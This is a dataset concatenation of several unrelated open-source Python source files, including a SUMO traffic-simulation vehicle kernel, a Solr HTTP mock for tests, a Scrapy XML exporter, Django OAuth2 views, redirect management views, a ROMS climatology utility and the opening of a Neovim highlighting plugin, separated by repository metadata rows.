return [self.get_route(vehID, error) for vehID in veh_id]
return self.__sumo_obs.get(veh_id, {}).get(tc.VAR_EDGES, error)
def get_length(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_length(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("length", error)
def get_leader(self, veh_id, error=""):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_leader(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("leader", error)
def get_follower(self, veh_id, error=""):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_follower(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("follower", error)
def get_headway(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_headway(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("headway", error)
def get_last_lc(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_headway(vehID, error) for vehID in veh_id]
if veh_id not in self.__rl_ids:
warnings.warn('Vehicle {} is not RL vehicle, "last_lc" term set to'
' {}.'.format(veh_id, error))
return error
else:
return self.__vehicles.get(veh_id, {}).get("headway", error)
def get_acc_controller(self, veh_id, error=None):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_acc_controller(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("acc_controller", error)
def get_lane_changing_controller(self, veh_id, error=None):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [
self.get_lane_changing_controller(vehID, error)
for vehID in veh_id
]
return self.__vehicles.get(veh_id, {}).get("lane_changer", error)
def get_routing_controller(self, veh_id, error=None):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [
self.get_routing_controller(vehID, error) for vehID in veh_id
]
return self.__vehicles.get(veh_id, {}).get("router", error)
def set_lane_headways(self, veh_id, lane_headways):
"""Set the lane headways of the specified vehicle."""
self.__vehicles[veh_id]["lane_headways"] = lane_headways
def get_lane_headways(self, veh_id, error=list()):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_lane_headways(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("lane_headways", error)
def get_lane_leaders_speed(self, veh_id, error=list()):
"""See parent class."""
lane_leaders = self.get_lane_leaders(veh_id)
return [0 if lane_leader == '' else self.get_speed(lane_leader)
for lane_leader in lane_leaders]
def get_lane_followers_speed(self, veh_id, error=list()):
"""See parent class."""
lane_followers = self.get_lane_followers(veh_id)
return [0 if lane_follower == '' else self.get_speed(lane_follower)
for lane_follower in lane_followers]
def set_lane_leaders(self, veh_id, lane_leaders):
"""Set the lane leaders of the specified vehicle."""
self.__vehicles[veh_id]["lane_leaders"] = lane_leaders
def get_lane_leaders(self, veh_id, error=list()):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_lane_leaders(vehID, error) for vehID in veh_id]
return self.__vehicles[veh_id]["lane_leaders"]
def set_lane_tailways(self, veh_id, lane_tailways):
"""Set the lane tailways of the specified vehicle."""
self.__vehicles[veh_id]["lane_tailways"] = lane_tailways
def get_lane_tailways(self, veh_id, error=list()):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_lane_tailways(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("lane_tailways", error)
def set_lane_followers(self, veh_id, lane_followers):
"""Set the lane followers of the specified vehicle."""
self.__vehicles[veh_id]["lane_followers"] = lane_followers
def get_lane_followers(self, veh_id, error=list()):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_lane_followers(vehID, error) for vehID in veh_id]
return self.__vehicles.get(veh_id, {}).get("lane_followers", error)
def _multi_lane_headways(self):
"""Compute multi-lane data for all vehicles.
This includes the lane leaders/followers/headways/tailways/
leader velocity/follower velocity for all
vehicles in the network.
"""
edge_list = self.master_kernel.scenario.get_edge_list()
junction_list = self.master_kernel.scenario.get_junction_list()
tot_list = edge_list + junction_list
num_edges = (len(self.master_kernel.scenario.get_edge_list()) + len(
self.master_kernel.scenario.get_junction_list()))
# maximum number of lanes in the network
max_lanes = max([self.master_kernel.scenario.num_lanes(edge_id)
for edge_id in tot_list])
# Key = edge id
# Element = list, with the ith element containing tuples with the name
# and position of all vehicles in lane i
edge_dict = dict.fromkeys(tot_list)
# add the vehicles to the edge_dict element
for veh_id in self.get_ids():
edge = self.get_edge(veh_id)
lane = self.get_lane(veh_id)
pos = self.get_position(veh_id)
if edge:
if edge_dict[edge] is None:
edge_dict[edge] = [[] for _ in range(max_lanes)]
edge_dict[edge][lane].append((veh_id, pos))
# sort all lanes in each edge by position
for edge in tot_list:
if edge_dict[edge] is None:
del edge_dict[edge]
else:
for lane in range(max_lanes):
edge_dict[edge][lane].sort(key=lambda x: x[1])
for veh_id in self.get_rl_ids():
# collect the lane leaders, followers, headways, and tailways for
# each vehicle
edge = self.get_edge(veh_id)
if edge:
headways, tailways, leaders, followers = \
self._multi_lane_headways_util(veh_id, edge_dict,
num_edges)
# add the above values to the vehicles class
self.set_lane_headways(veh_id, headways)
self.set_lane_tailways(veh_id, tailways)
self.set_lane_leaders(veh_id, leaders)
self.set_lane_followers(veh_id, followers)
self._ids_by_edge = dict().fromkeys(edge_list)
for edge_id in edge_dict:
edges = list(itertools.chain.from_iterable(edge_dict[edge_id]))
# check for edges with no vehicles
if len(edges) > 0:
edges, _ = zip(*edges)
self._ids_by_edge[edge_id] = list(edges)
else:
self._ids_by_edge[edge_id] = []
def _multi_lane_headways_util(self, veh_id, edge_dict, num_edges):
"""Compute multi-lane data for the specified vehicle.
Parameters
----------
veh_id : str
name of the vehicle
edge_dict : dict < list<tuple> >
Key = Edge name
Index = lane index
Element = list sorted by position of (vehicle id, position)
Returns
-------
headway : list<float>
Index = lane index
Element = headway at this lane
tailway : list<float>
Index = lane index
Element = tailway at this lane
lead_speed : list<str>
Index = lane index
Element = speed of leader at this lane
follow_speed : list<str>
Index = lane index
Element = speed of follower at this lane
leader : list<str>
Index = lane index
Element = leader at this lane
follower : list<str>
Index = lane index
Element = follower at this lane
"""
this_pos = self.get_position(veh_id)
this_edge = self.get_edge(veh_id)
this_lane = self.get_lane(veh_id)
num_lanes = self.master_kernel.scenario.num_lanes(this_edge)
# set default values for all output values
headway = [1000] * num_lanes
tailway = [1000] * num_lanes
leader = [""] * num_lanes
follower = [""] * num_lanes
for lane in range(num_lanes):
# check the vehicle's current edge for lane leaders and followers
if len(edge_dict[this_edge][lane]) > 0:
ids, positions = zip(*edge_dict[this_edge][lane])
ids = list(ids)
positions = list(positions)
index = bisect_left(positions, this_pos)
# if you are at the end or the front of the edge, the lane
# leader is in the edges in front of you
if (lane == this_lane and index < len(positions) - 1) \
or (lane != this_lane and index < len(positions)):
# check if the index does not correspond to the current
# vehicle
if ids[index] == veh_id:
leader[lane] = ids[index + 1]
headway[lane] = (positions[index + 1] - this_pos -
self.get_length(leader[lane]))
else:
leader[lane] = ids[index]
headway[lane] = (positions[index] - this_pos
- self.get_length(leader[lane]))
# you are in the back of the queue, the lane follower is in the
# edges behind you
if index > 0:
follower[lane] = ids[index - 1]
tailway[lane] = (this_pos - positions[index - 1]
- self.get_length(veh_id))
# if lane leader not found, check next edges
if leader[lane] == "":
headway[lane], leader[lane] = self._next_edge_leaders(
veh_id, edge_dict, lane, num_edges)
# if lane follower not found, check previous edges
if follower[lane] == "":
tailway[lane], follower[lane] = self._prev_edge_followers(
veh_id, edge_dict, lane, num_edges)
return headway, tailway, leader, follower
def _next_edge_leaders(self, veh_id, edge_dict, lane, num_edges):
"""Search for leaders in the next edge.
Looks to the edges/junctions in front of the vehicle's current edge
for potential leaders. This is currently done by only looking one
edge/junction forwards.
Returns
-------
headway : float
lane headway for the specified lane
leader : str
lane leader for the specified lane
"""
pos = self.get_position(veh_id)
edge = self.get_edge(veh_id)
headway = 1000 # env.scenario.length
leader = ""
add_length = 0 # length increment in headway
for _ in range(num_edges):
# break if there are no edge/lane pairs behind the current one
if len(self.master_kernel.scenario.next_edge(edge, lane)) == 0:
break
add_length += self.master_kernel.scenario.edge_length(edge)
edge, lane = self.master_kernel.scenario.next_edge(edge, lane)[0]
try:
if len(edge_dict[edge][lane]) > 0:
leader = edge_dict[edge][lane][0][0]
headway = edge_dict[edge][lane][0][1] - pos + add_length \
- self.get_length(leader)
except KeyError:
# current edge has no vehicles, so move on
# print(traceback.format_exc())
continue
# stop if a lane follower is found
if leader != "":
break
return headway, leader
def _prev_edge_followers(self, veh_id, edge_dict, lane, num_edges):
"""Search for followers in the previous edge.
Looks to the edges/junctions behind the vehicle's current edge for
potential followers. This is currently done by only looking one
edge/junction backwards.
Returns
-------
tailway : float
lane tailway for the specified lane
follower : str
lane follower for the specified lane
"""
pos = self.get_position(veh_id)
edge = self.get_edge(veh_id)
tailway = 1000 # env.scenario.length
follower = ""
add_length = 0 # length increment in headway
for _ in range(num_edges):
# break if there are no edge/lane pairs behind the current one
if len(self.master_kernel.scenario.prev_edge(edge, lane)) == 0:
break
edge, lane = self.master_kernel.scenario.prev_edge(edge, lane)[0]
add_length += self.master_kernel.scenario.edge_length(edge)
try:
if len(edge_dict[edge][lane]) > 0:
tailway = pos - edge_dict[edge][lane][-1][1] + add_length \
- self.get_length(veh_id)
follower = edge_dict[edge][lane][-1][0]
except KeyError:
# current edge has no vehicles, so move on
# print(traceback.format_exc())
continue
# stop if a lane follower is found
if follower != "":
break
return tailway, follower
def apply_acceleration(self, veh_ids, acc):
"""See parent class."""
# to hand the case of a single vehicle
if type(veh_ids) == str:
veh_ids = [veh_ids]
acc = [acc]
for i, vid in enumerate(veh_ids):
if acc[i] is not None and vid in self.get_ids():
this_vel = self.get_speed(vid)
next_vel = max([this_vel + acc[i] * self.sim_step, 0])
self.kernel_api.vehicle.slowDown(vid, next_vel, 1e-3)
def apply_lane_change(self, veh_ids, direction):
"""See parent class."""
# to hand the case of a single vehicle
if type(veh_ids) == str:
veh_ids = [veh_ids]
direction = [direction]
# if any of the directions are not -1, 0, or 1, raise a ValueError
if any(d not in [-1, 0, 1] for d in direction):
raise ValueError(
"Direction values for lane changes may only be: -1, 0, or 1.")
for i, veh_id in enumerate(veh_ids):
# check for no lane change
if direction[i] == 0:
continue
# compute the target lane, and clip it so vehicle don't try to lane
# change out of range
this_lane = self.get_lane(veh_id)
this_edge = self.get_edge(veh_id)
target_lane = min(
max(this_lane + direction[i], 0),
self.master_kernel.scenario.num_lanes(this_edge) - 1)
# perform the requested lane action action in TraCI
if target_lane != this_lane:
self.kernel_api.vehicle.changeLane(
veh_id, int(target_lane), 100000)
if veh_id in self.get_rl_ids():
self.prev_last_lc[veh_id] = \
self.__vehicles[veh_id]["last_lc"]
def choose_routes(self, veh_ids, route_choices):
"""See parent class."""
# to hand the case of a single vehicle
if type(veh_ids) == str:
veh_ids = [veh_ids]
route_choices = [route_choices]
for i, veh_id in enumerate(veh_ids):
if route_choices[i] is not None:
self.kernel_api.vehicle.setRoute(
vehID=veh_id, edgeList=route_choices[i])
def get_x_by_id(self, veh_id):
"""See parent class."""
if self.get_edge(veh_id) == '':
# occurs when a vehicle crashes is teleported for some other reason
return 0.
return self.master_kernel.scenario.get_x(
self.get_edge(veh_id), self.get_position(veh_id))
def update_vehicle_colors(self):
"""See parent class.
The colors of all vehicles are updated as follows:
- red: autonomous (rl) vehicles
- white: unobserved human-driven vehicles
- cyan: observed human-driven vehicles
"""
for veh_id in self.get_rl_ids():
try:
# color rl vehicles red
self.set_color(veh_id=veh_id, color=RED)
except (FatalTraCIError, TraCIException) as e:
print('Error when updating rl vehicle colors:', e)
print(traceback.format_exc())
# color vehicles white if not observed and cyan if observed
for veh_id in self.get_human_ids():
try:
color = CYAN if veh_id in self.get_observed_ids() else WHITE
self.set_color(veh_id=veh_id, color=color)
except (FatalTraCIError, TraCIException) as e:
print('Error when updating human vehicle colors:', e)
print(traceback.format_exc())
# clear the list of observed vehicles
for veh_id in self.get_observed_ids():
self.remove_observed(veh_id)
def get_color(self, veh_id):
"""See parent class.
This does not pass the last term (i.e. transparency).
"""
r, g, b, t = self.kernel_api.vehicle.getColor(veh_id)
return r, g, b
def set_color(self, veh_id, color):
"""See parent class.
The last term for sumo (transparency) is set to 255.
"""
if self._color_vehicles:
r, g, b = color
self.kernel_api.vehicle.setColor(
vehID=veh_id, color=(r, g, b, 255))
def add(self, veh_id, type_id, edge, pos, lane, speed):
"""See parent class."""
if veh_id in self.master_kernel.scenario.rts:
# If the vehicle has its own route, use that route. This is used in
# the case of network templates.
route_id = 'route{}_0'.format(veh_id)
else:
num_routes = len(self.master_kernel.scenario.rts[edge])
frac = [val[1] for val in self.master_kernel.scenario.rts[edge]]
route_id = 'route{}_{}'.format(edge, np.random.choice(
[i for i in range(num_routes)], size=1, p=frac)[0])
self.kernel_api.vehicle.addFull(
veh_id,
route_id,
typeID=str(type_id),
departLane=str(lane),
departPos=str(pos),
departSpeed=str(speed))
def get_max_speed(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_max_speed(vehID, error) for vehID in veh_id]
return self.kernel_api.vehicle.getMaxSpeed(veh_id)
def set_max_speed(self, veh_id, max_speed):
"""See parent class."""
self.kernel_api.vehicle.setMaxSpeed(veh_id, max_speed)
| mit | -1,442,293,774,495,089,400 | 38.736533 | 79 | 0.559316 | false | 3.683919 | false | false | false |
jonnybazookatone/solr-service | solr/tests/mocks.py | 1 | 2172 | """
Mock responses
"""
from httpretty import HTTPretty
from .stubdata.solr import example_solr_response
import json
class HTTPrettyMock(object):
"""
httpretty context manager scaffolding
"""
def __enter__(self):
HTTPretty.enable()
def __exit__(self, etype, value, traceback):
"""
:param etype: exit type
:param value: exit value
:param traceback: the traceback for the exit
"""
HTTPretty.reset()
HTTPretty.disable()
class MockSolrResponse(HTTPrettyMock):
"""
context manager that mocks a Solr response
"""
def __init__(self, api_endpoint):
"""
:param api_endpoint: name of the API end point
"""
self.api_endpoint = api_endpoint
def request_callback(request, uri, headers):
"""
:param request: HTTP request
:param uri: URI/URL to send the request
:param headers: header of the HTTP request
:return: httpretty response
"""
resp = json.loads(example_solr_response)
resp['responseHeader'] = {'params': request.parsed_body}
# Mimic the start, rows behaviour
rows = int(
request.parsed_body.get(
'rows', [len(resp['response']['docs'])]
)[0]
)
start = int(request.querystring.get('start', [0])[0])
try:
resp['response']['docs'] = resp['response']['docs'][start:start+rows]
except IndexError:
resp['response']['docs'] = resp['response']['docs'][start:]
# Mimic the filter "fl" behaviour
fl = request.parsed_body['fl'][0].split(',')
resp['response']['docs'] = [
{field: doc.get(field) for field in fl}
for doc in resp['response']['docs']
]
return 200, headers, json.dumps(resp)
HTTPretty.register_uri(
HTTPretty.POST,
self.api_endpoint,
body=request_callback,
content_type="application/json"
) | mit | -4,958,901,464,828,584,000 | 26.858974 | 85 | 0.524401 | false | 4.534447 | false | false | false |
niklasben/BAThesis | Crawler/Scrapy_One/pipelines.py | 1 | 1407 | # -*- coding: utf-8 -*-
"""
Created on Fri Jul 24 15:50:53 2015
@author: Niklas Bendixen
"""
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/topics/item-pipeline.html
from scrapy import signals # http://doc.scrapy.org/en/1.0/topics/signals.html
from scrapy.exporters import XmlItemExporter # http://doc.scrapy.org/en/1.0/topics/exporters.html#xmlitemexporter
class XmlExportPipeline(object):
def __init__(self):
self.files = {}
@classmethod
def from_crawler(cls, crawler):
pipeline = cls()
crawler.signals.connect(pipeline.spider_opened, signals.spider_opened)
crawler.signals.connect(pipeline.spider_closed, signals.spider_closed)
return pipeline
def spider_opened(self, spider):
xml_name = str(spider.allowed_domains)
xml_name = xml_name[2:-2]
file = open('../../output/%s_crawled.xml' % xml_name, 'w+b')
self.files[spider] = file
self.exporter = XmlItemExporter(file, root_element = 'root', item_element = 'item')
self.exporter.start_exporting()
def spider_closed(self, spider):
self.exporter.finish_exporting()
file = self.files.pop(spider)
file.close()
def process_item(self, item, spider):
self.exporter.export_item(item)
return item | mit | -7,774,707,310,006,759,000 | 31.744186 | 116 | 0.651741 | false | 3.544081 | false | false | false |
leifj/django-oauth2-lite | django_oauth2_lite/views.py | 1 | 7049 | """Views for django_oauth2_lite application."""
from django.shortcuts import render_to_response, get_object_or_404
from django_oauth2_lite.models import Client, scope_by_name, code_by_token, token_by_value,\
Scope, Token
from django_oauth2_lite.forms import CodeForm, ClientForm
from django.http import HttpResponseBadRequest, HttpResponse,\
HttpResponseRedirect
from django.utils import simplejson
from django_oauth2_lite.decorators import clientauth_required
from django.views.generic.list_detail import object_list
from django.contrib.auth.decorators import login_required
def _get(request,key,dflt=None):
if request.GET.has_key(key):
return request.GET[key]
else:
return dflt
def _post(request,key,dflt=None):
if request.POST.has_key(key):
return request.POST[key]
else:
return dflt
def response_dict(request,d):
if request.user.is_authenticated():
d['user'] = request.user
if request.user and hasattr(request.user,'get_profile'):
d['profile'] = request.user.get_profile()
return d
@login_required
def do_authorize(request,state,template_name):
client = get_object_or_404(Client,client_id=_get(request,'client_id'))
if _get(request,'response_type','code') != 'code':
return client.redirect({'error': 'unsupported_response_type','state': state})
code = client.new_authz_code(owner=request.user,state=state)
for n in _get(request,'scope',"").split(' '):
scope = scope_by_name(n)
if scope == None:
return client.redirect({'error': 'invalid_scope','state': state})
code.token.scopes.add(scope)
form = CodeForm(instance=code)
form.fields['code'].initial = code.token.value
return render_to_response(template_name,response_dict(request,{"form": form, 'client': code.token.client, 'scopes': code.token.scopes}))
def authorize(request,template_name='django_oauth2_lite/authorize.html'):
state = None
if request.REQUEST.has_key('state'):
state = request.REQUEST['state']
if request.method == 'POST':
form = CodeForm(request.POST)
if form.is_valid():
code = code_by_token(form.cleaned_data['code'])
if code == None:
return code.token.client.redirect({'state': state, 'error': 'invalid_request'})
if form.cleaned_data['authorized']:
code.authorized = True
code.save()
return code.token.client.redirect({'state': state,'code': code.token.value})
else:
code.token.delete()
code.delete()
return code.token.client.redirect({'error': 'access_denied','state': state})
else:
return code.token.client.redirect({'error': 'invalid_request','state': state})
else:
return do_authorize(request,state,template_name)
def json_response(data):
r = HttpResponse(simplejson.dumps(data),content_type='application/json')
r['Cache-Control'] = 'no-store'
r['Pragma'] = 'no-cache'
return r
def token_error(error):
return json_response({'error': error})
@clientauth_required
def token(request):
if not request.method == 'POST':
return HttpResponseBadRequest()
grant_type = _post(request,'grant_type')
at = None
if grant_type == 'authorization_code':
code = code_by_token(_post(request,'code'))
if not code:
return token_error('invalid_grant')
if not code.is_valid():
if code.token:
if code.token.refresh_token:
code.token.refresh_token.delete()
code.token.delete()
code.delete()
return token_error('invalid_grant')
at = code.new_access_token()
elif grant_type == 'refresh_token':
rt = token_by_value(_post(request,'refresh_token'))
if not rt:
return token_error('invalid_grant')
if not rt.is_valid():
rt.delete()
return token_error('invalid_grant')
## TODO: scope is silently ignored right now - should honor request to narrow scope
at = rt.client.new_access_token(rt.owner, refresh_token=rt)
else:
return token_error('unsupported_grant_type')
return json_response({'access_token': at.value,
'token_type': at.type(),
'expires_in': 3600,
'refresh_token': at.refresh_token.value})
@login_required
def clients(request,template_name='django_oauth2_lite/clients.html'):
queryset = Client.objects.filter(owner=request.user)
return object_list(request,
template_object_name='client',
queryset=queryset,
template_name=template_name)
@login_required
def tokens(request,template_name='django_oauth2_lite/tokens.html'):
queryset = Token.objects.filter(owner=request.user,refresh_token=None)
return object_list(request,
template_object_name='token',
queryset=queryset,
template_name=template_name)
@login_required
def add_client(request,template_name="django_oauth2_lite/client_form.html"):
if request.method == 'POST':
client = Client(owner=request.user)
form = ClientForm(request.POST,request.FILES,instance=client)
if form.is_valid():
form.save()
return HttpResponseRedirect("../clients")
else:
form = ClientForm()
return render_to_response(template_name,response_dict(request,{'form': form}))
@login_required
def remove_client(request,id):
client = get_object_or_404(Client,id=id)
if client:
client.delete()
return HttpResponseRedirect("../../clients")
@login_required
def remove_token(request,id):
token = get_object_or_404(Token,id=id)
if token:
token.delete()
return HttpResponseRedirect("../../tokens")
# Manage scopes in the admin view
def callback(request,template_name="django_oauth2_lite/callback.html"):
return render_to_response(template_name,response_dict(request,{'error': _get(request,'error'),
'state': _get(request,'state'),
'code': _get(request,'code')}))
@login_required
def test_client(request,id,template_name='django_oauth2_lite/test.html'):
client = get_object_or_404(Client,id=id)
return render_to_response(template_name,response_dict(request,{'client': client,'scopes': Scope.objects.all()}))
@login_required
def scopes(request,template_name='django_oauth2_lite/scopes.html'):
queryset = Scope.objects.all()
return object_list(request,
template_object_name='scope',
queryset=queryset,
template_name=template_name) | bsd-3-clause | 2,089,378,351,555,912,700 | 36.700535 | 140 | 0.612285 | false | 3.996032 | false | false | false |
asidev/aybu-manager | aybu/manager/rest/views/redirects.py | 1 | 3836 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copyright 2010-2012 Asidev s.r.l.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from aybu.manager.models.validators import (validate_hostname,
check_domain_not_used)
from aybu.manager.exc import ParamsError
from aybu.manager.models import (Instance,
Redirect)
from pyramid.view import view_config
from sqlalchemy.orm.exc import NoResultFound
@view_config(route_name='redirects', request_method=('HEAD', 'GET'))
def list(context, request):
return {r.source: r.to_dict() for r in Redirect.all(request.db_session)}
@view_config(route_name='redirects', request_method='POST',
renderer='taskresponse')
def create(context, request):
try:
source = validate_hostname(request.params['source'])
instance = Instance.get_by_domain(request.db_session,
request.params['destination'])
http_code = request.params.get('http_code', 301)
target_path = request.params.get('target_path', '')
check_domain_not_used(request, source)
except KeyError as e:
raise ParamsError(e)
except NoResultFound:
raise ParamsError('No instance for domain {}'\
.format(request.params['destination']))
else:
params = dict(source=source, instance_id=instance.id,
http_code=http_code, target_path=target_path)
return request.submit_task('redirect.create', **params)
@view_config(route_name='redirect', request_method=('HEAD', 'GET'))
def info(context, request):
return Redirect.get(request.db_session,
request.matchdict['source']).to_dict()
@view_config(route_name='redirect', request_method='DELETE',
renderer='taskresponse')
def delete(context, request):
source = request.matchdict['source']
Redirect.get(request.db_session, source)
return request.submit_task('redirect.delete', source=source)
@view_config(route_name='redirect', request_method='PUT',
renderer='taskresponse')
def update(context, request):
params = dict()
source = request.matchdict['source']
Redirect.get(request.db_session, source)
specs = (
('new_source', check_domain_not_used, [request]),
('destination', Instance.get_by_domain, [request.db_session]),
('http_code', None, None),
('target_path', None, None)
)
try:
for attr, validate_fun, fun_args in specs:
if attr in request.params:
if validate_fun:
fun_args.append(request.params[attr])
params[attr] = validate_fun(*fun_args)
else:
params[attr] = request.params[attr]
except NoResultFound:
raise ParamsError("No instance for domain {}"\
.format(request.params['destination']))
if not params:
raise ParamsError("Missing update fields")
params['source'] = source
if "destination" in params:
params['instance_id'] = params['destination'].id
del params['destination']
if "new_source" in params:
params['new_source'] = validate_hostname(params['new_source'])
return request.submit_task('redirect.update', **params)
| apache-2.0 | 3,540,996,744,243,458,000 | 34.192661 | 76 | 0.637643 | false | 4.107066 | true | false | false |
mahim97/zulip | zerver/views/user_groups.py | 2 | 4527 | from django.http import HttpResponse, HttpRequest
from django.utils.translation import ugettext as _
from typing import List, Text
from zerver.context_processors import get_realm_from_request
from zerver.lib.actions import check_add_user_group, do_update_user_group_name, \
do_update_user_group_description, bulk_add_members_to_user_group, \
remove_members_from_user_group, check_delete_user_group
from zerver.lib.exceptions import JsonableError
from zerver.lib.request import has_request_variables, REQ
from zerver.lib.response import json_success, json_error
from zerver.lib.users import user_ids_to_users
from zerver.lib.validator import check_list, check_string, check_int, \
check_short_string
from zerver.lib.user_groups import access_user_group_by_id, get_memberships_of_users
from zerver.models import UserProfile, UserGroup, UserGroupMembership
from zerver.views.streams import compose_views, FuncKwargPair
@has_request_variables
def add_user_group(request, user_profile,
name=REQ(),
members=REQ(validator=check_list(check_int), default=[]),
description=REQ()):
# type: (HttpRequest, UserProfile, Text, List[int], Text) -> HttpResponse
user_profiles = user_ids_to_users(members, user_profile.realm)
check_add_user_group(user_profile.realm, name, user_profiles, description)
return json_success()
@has_request_variables
def edit_user_group(request, user_profile,
user_group_id=REQ(validator=check_int),
name=REQ(default=""), description=REQ(default="")):
# type: (HttpRequest, UserProfile, int, Text, Text) -> HttpResponse
if not (name or description):
return json_error(_("No new data supplied"))
user_group = access_user_group_by_id(user_group_id, realm=user_profile.realm)
result = {}
if name != user_group.name:
do_update_user_group_name(user_group, name)
result['name'] = _("Name successfully updated.")
if description != user_group.description:
do_update_user_group_description(user_group, description)
result['description'] = _("Description successfully updated.")
return json_success(result)
@has_request_variables
def delete_user_group(request: HttpRequest, user_profile: UserProfile,
user_group_id: int=REQ(validator=check_int)) -> HttpResponse:
check_delete_user_group(user_group_id, user_profile.realm)
return json_success()
@has_request_variables
def update_user_group_backend(request, user_profile,
user_group_id=REQ(validator=check_int),
delete=REQ(validator=check_list(check_int), default=[]),
add=REQ(validator=check_list(check_int), default=[])):
# type: (HttpRequest, UserProfile, int, List[int], List[int]) -> HttpResponse
if not add and not delete:
return json_error(_('Nothing to do. Specify at least one of "add" or "delete".'))
method_kwarg_pairs = [
(add_members_to_group_backend,
dict(user_group_id=user_group_id, members=add)),
(remove_members_from_group_backend,
dict(user_group_id=user_group_id, members=delete))
] # type: List[FuncKwargPair]
return compose_views(request, user_profile, method_kwarg_pairs)
def add_members_to_group_backend(request: HttpRequest, user_profile: UserProfile,
user_group_id: int, members: List[int]) -> HttpResponse:
if not members:
return json_success()
user_group = access_user_group_by_id(user_group_id, user_profile.realm)
user_profiles = user_ids_to_users(members, user_profile.realm)
existing_member_ids = set(get_memberships_of_users(user_group, user_profiles))
for user_profile in user_profiles:
if user_profile.id in existing_member_ids:
raise JsonableError(_("User %s is already a member of this group" % (user_profile.id,)))
bulk_add_members_to_user_group(user_group, user_profiles)
return json_success()
def remove_members_from_group_backend(request: HttpRequest, user_profile: UserProfile,
user_group_id: int, members: List[int]) -> HttpResponse:
if not members:
return json_success()
user_profiles = user_ids_to_users(members, user_profile.realm)
user_group = access_user_group_by_id(user_group_id, user_profile.realm)
remove_members_from_user_group(user_group, user_profiles)
return json_success()
| apache-2.0 | -87,036,672,447,215,310 | 45.193878 | 100 | 0.680804 | false | 3.750621 | false | false | false |
dalepartridge/seapy | roms/clim.py | 1 | 2439 | #!/usr/bin/env python
"""
clim.py
ROMS climatology utilities
Written by Brian Powell on 08/15/15
Copyright (c)2017 University of Hawaii under the BSD-License.
"""
import seapy
import numpy as np
import netCDF4
clim_times = ('zeta_time', 'v2d_time', 'v3d_time', 'temp_time', 'salt_time')
def gen_bry_clim(clim_file, grid, bry):
"""
Taking the results of gen_ncks and interpolation, stitch together
climatology files that were interpolated using only the boundary regions
into a single climatology (with no data where interpolation wasn't
performed).
Parameters
----------
clim_file: str,
The name of the output climate file
grid: seapy.model.grid or str,
The output ROMS grid
bry: dict,
A dictionary prescribing the climatology file interpolated for each
boundary side.
{"west":filename, "south":filename}, ...}
Returns
-------
None
"""
grid = seapy.model.asgrid(grid)
# Grab the first dictionary record and use it to determine the number
# of times in the new climatology file
nc = netCDF4.Dataset(bry[list(bry.keys())[0]])
reftime, time = seapy.roms.get_reftime(nc)
times = nc.variables[time][:]
nc.close()
# Create the new climatology file
ncout = seapy.roms.ncgen.create_clim(clim_file,
eta_rho=grid.ln, xi_rho=grid.lm, s_rho=grid.n,
ntimes=len(times), reftime=reftime,
title="stitched from boundary interpolation")
ncout.variables["clim_time"][:] = times
for side in bry:
if bry[side] is None:
continue
ncin = netCDF4.Dataset(bry[side])
for fld in seapy.roms.fields:
idx = [np.s_[:] for i in range(seapy.roms.fields[fld]["dims"] + 1)]
dat = ncin.variables[fld][:]
shp = dat.shape
if side == "west":
idx[-1] = np.s_[:shp[-1]]
pass
elif side == "east":
idx[-1] = np.s_[-shp[-1]:]
pass
elif side == "north":
idx[-2] = np.s_[-shp[-2]:]
pass
elif side == "south":
idx[-2] = np.s_[:shp[-2]]
pass
ncout.variables[fld][idx] = dat
ncout.sync()
ncin.close()
ncout.close()
| mit | 7,935,772,191,182,559,000 | 28.743902 | 87 | 0.542845 | false | 3.592047 | false | false | false |
arakashic/chromatica.nvim | rplugin/python3/chromatica/__init__.py | 1 | 2408 | # ============================================================================
# FILE: chromatica.py
# AUTHOR: Yanfei Guo <yanf.guo at gmail.com>
# License: MIT license
# ============================================================================
import pynvim
from chromatica import logger
from chromatica.chromatica import Chromatica
import chromatica.util as util
import time
@pynvim.plugin
class ChromaticaPlugin(object):
def __init__(self, vim):
self.__vim = vim
util.use_vim(vim)
@pynvim.function("_chromatica", sync=True)
def init_chromatica(self, args):
self.__chromatica = Chromatica(self.__vim)
self.__vim.vars["chromatica#_channel_id"] = self.__vim.channel_id
@pynvim.rpc_export('chromatica_enable_logging', sync=True)
def enable_logging(self, level, logfile):
if not self.__chromatica.debug_enabled:
logger.setup(self.__vim, level, logfile)
self.__chromatica.debug_enabled = True
self.__chromatica.dump_debug_info()
@pynvim.rpc_export("chromatica_highlight")
def highlight(self, context):
context["rpc"] = "chromatica_highlight"
try:
self.__chromatica.highlight(context)
except:
self.__chromatica.debug(context)
raise
@pynvim.rpc_export("chromatica_parse")
def parse(self, context):
context["rpc"] = "chromatica_parse"
try:
